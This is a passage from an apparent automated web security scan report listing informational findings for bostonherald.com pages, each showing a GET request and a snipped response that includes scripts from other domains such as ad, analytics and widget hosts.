   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

18.590. http://www.bostonherald.com/blogs/sports/rap_sheet/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/sports/rap_sheet/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/sports/rap_sheet/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:48:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/rap_sheet/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 115344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

18.591. http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/sports/rap_sheet/index.php/2011/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/sports/rap_sheet/index.php/2011/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:49:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/rap_sheet/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 63965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

18.592. http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:50:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://www.bostonherald.com/blogs/sports/red_sox/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<td>
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

18.593. http://www.bostonherald.com/business/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:07:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 89129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://hosted.ap.org/lineups/BIZMARKETS_LIST-bulleted.js?SITE=MABOH&SECTION=sports"></script>
...[SNIP]...
<div style="float: left; background-color:#fff;width:175px; padding:20px 5px; margin:0px; height:260px; overflow:hidden;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=2&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.594. http://www.bostonherald.com/business/automotive/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/automotive/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/automotive/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:22:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 56825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.595. http://www.bostonherald.com/business/automotive/view/20110127gm_says_it_no_longer_needs_govt_loan_to_go_green/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/automotive/view/20110127gm_says_it_no_longer_needs_govt_loan_to_go_green/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/automotive/view/20110127gm_says_it_no_longer_needs_govt_loan_to_go_green/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:22:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.596. http://www.bostonherald.com/business/automotive/view/20110128electric-car_batteries_spur_curiosity_questions/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/automotive/view/20110128electric-car_batteries_spur_curiosity_questions/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/automotive/view/20110128electric-car_batteries_spur_curiosity_questions/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:21:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 43147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.597. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:20:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 79220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.598. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:20:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
